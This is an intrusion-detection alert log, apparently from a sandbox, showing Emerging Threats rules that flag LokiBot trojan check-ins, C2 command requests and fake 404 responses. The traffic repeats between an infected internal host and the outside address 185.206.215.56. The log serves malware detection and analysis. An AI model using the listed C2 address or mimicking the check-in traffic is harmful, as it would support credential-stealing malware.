01/05/21-19:06:45.633934 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49264 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.789961 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49264 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:45.996354 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49265 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.996354 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49265 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.996354 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49265 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:45.996354 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49265 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:46.162508 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49265 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:46.366773 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49266 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:46.366773 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49266 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:46.366773 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49266 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:46.366773 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49266 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:46.523351 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49266 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:46.730742 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49267 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:46.730742 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49267 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:46.730742 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49267 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:46.730742 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49267 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:46.897287 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49267 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:47.102635 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49268 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:47.102635 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49268 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:47.102635 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49268 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:47.102635 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49268 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:47.257102 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49268 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:47.475682 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49269 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:47.475682 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49269 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:47.475682 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49269 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:47.475682 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49269 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:47.647987 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49269 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:47.867741 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49270 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:47.867741 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49270 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:47.867741 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49270 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:47.867741 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49270 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:48.042229 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49270 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:48.254686 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49271 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:48.254686 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49271 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:48.254686 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49271 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:48.254686 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49271 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:48.422139 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49271 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:48.626007 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49272 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:48.626007 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49272 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:48.626007 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49272 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:48.626007 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49272 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:48.788675 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49272 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:49.009732 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49273 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.009732 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49273 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.009732 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49273 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.009732 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49273 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.170301 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49273 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:49.377604 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49274 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.377604 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49274 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.377604 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49274 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.377604 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49274 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.549512 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49274 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:49.748267 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49275 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.748267 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49275 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.748267 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49275 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.748267 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49275 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:49.910769 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49275 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:50.119352 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49276 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.119352 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49276 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.119352 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49276 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.119352 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49276 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.275711 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49276 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:50.486914 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49277 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.486914 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49277 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.486914 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49277 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.486914 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49277 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.662352 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49277 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:50.870071 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49278 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.870071 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49278 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.870071 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49278 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:50.870071 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49278 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.028077 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49278 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:51.234373 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49279 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.234373 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49279 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.234373 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49279 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.234373 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49279 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.393173 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49279 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:51.603753 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49280 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.603753 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49280 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.603753 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49280 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.603753 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49280 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.756889 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49280 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:51.974612 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49281 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.974612 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49281 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.974612 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49281 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:51.974612 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49281 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:52.147882 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49281 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:52.356383 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49282 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:52.356383 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49282 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:52.356383 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49282 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:52.356383 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49282 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:52.526790 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49282 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:52.728532 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49283 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:52.728532 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49283 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:52.728532 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49283 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:52.728532 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49283 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:52.923052 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49283 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:53.137321 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49284 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.137321 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49284 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.137321 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49284 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.137321 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49284 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.310694 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49284 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:53.527158 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49285 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.527158 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49285 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.527158 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49285 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.527158 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49285 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.705442 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49285 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:53.922499 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49286 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.922499 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49286 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.922499 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49286 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:53.922499 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49286 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:54.077631 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49286 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:54.285753 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49287 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:54.285753 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49287 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:54.285753 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49287 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:54.285753 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49287 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:54.453918 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49287 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:54.662267 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49288 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:54.662267 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49288 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:54.662267 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49288 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:54.662267 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49288 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:54.864166 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49288 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:55.070986 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49289 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.070986 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49289 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.070986 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49289 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.070986 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49289 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.223019 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49289 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:55.427131 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49290 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.427131 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49290 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.427131 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49290 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.427131 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49290 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.590567 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49290 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:55.812036 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49291 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.812036 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49291 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.812036 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49291 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.812036 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49291 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:55.997742 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49291 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:56.213303 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49292 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:56.213303 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49292 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:56.213303 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49292 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:56.213303 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49292 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:56.397187 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49292 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:56.594263 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49293 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:56.594263 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49293 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:56.594263 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49293 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:56.594263 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49293 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:56.764004 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49293 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:56.973338 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49294 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:56.973338 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49294 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:56.973338 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49294 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:56.973338 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49294 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:57.143234 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49294 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:57.346021 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49295 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:57.346021 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49295 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:57.346021 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49295 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:57.346021 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49295 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:57.532123 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49295 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:57.742988 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49296 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:57.742988 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49296 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:57.742988 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49296 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:57.742988 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49296 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:57.910447 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49296 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:58.107472 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49297 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:58.107472 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49297 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:58.107472 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49297 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:58.107472 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49297 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:58.291278 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49297 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:58.499485 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49298 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:58.499485 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49298 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:58.499485 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49298 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:58.499485 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49298 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:58.677455 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49298 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:58.918368 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49299 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:58.918368 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49299 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:58.918368 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49299 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:58.918368 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49299 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:59.104108 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49299 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:59.313559 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49300 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:59.313559 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49300 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:59.313559 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49300 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:59.313559 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49300 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:59.474234 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49300 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:59.687246 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49301 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:59.687246 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49301 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:59.687246 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49301 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:59.687246 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49301 | 80 | 192.168.2.22 | 185.206.215.56 |
